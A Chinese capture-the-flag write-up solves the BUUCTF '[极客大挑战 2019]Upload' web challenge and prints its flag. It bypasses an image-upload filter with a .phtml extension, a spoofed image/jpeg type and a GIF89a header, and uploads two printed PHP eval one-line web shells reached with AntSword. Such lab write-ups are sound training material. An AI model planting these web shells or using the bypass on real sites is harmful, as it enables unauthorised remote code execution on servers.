BUUCTF-Web:[极客大挑战 2019]Upload

题目

解题过程

1、上传文件

从网页上来看是上传一个图片文件，但我们不知道他的检查上传的文件，所以可以试一试上传各种文件。一般检查文件的地方有：后缀名、content-type、文件头的部分内容。
这里我们先上传一个php文件,不做任何修改。如下图：

结果如下：

2、修改文件后缀名和content-type

将文件名修改为shell.phtml，绕过常规php文件后缀检测
将文件类型修改为：image/jpeg
注意：phtml一般是指嵌入了php代码的html文件，但是同样也会作为php解析

修改后内容如下：

上传结果如下：

因为我的一句话木马存在?>,所以被过滤了，所以我们需要将一句话木马进行修改来绕过限制
修改前的一句话木马如下：

<?php @eval($_POST['1234'])?>

修改后的一句话木马如下：

GIF89a?
<script language="php">eval($_REQUEST[1234])</script>

重新上传，修改后的内容如下:

上传成功，结果如下：

3、蚁剑连接

使用蚁剑连接上传的一句话木马

连接成功后可以在根目录找到flag

flag文件内容如下：

所以这道题的flag如下：

flag{fef7bf6b-fd3d-4142-8d08-29181ee9525d}

总结

以上就是我对这道题的解法。因本人菜鸡一只，如果有什么不对的地方，实属正常。还请各位大佬予以指正，谢谢！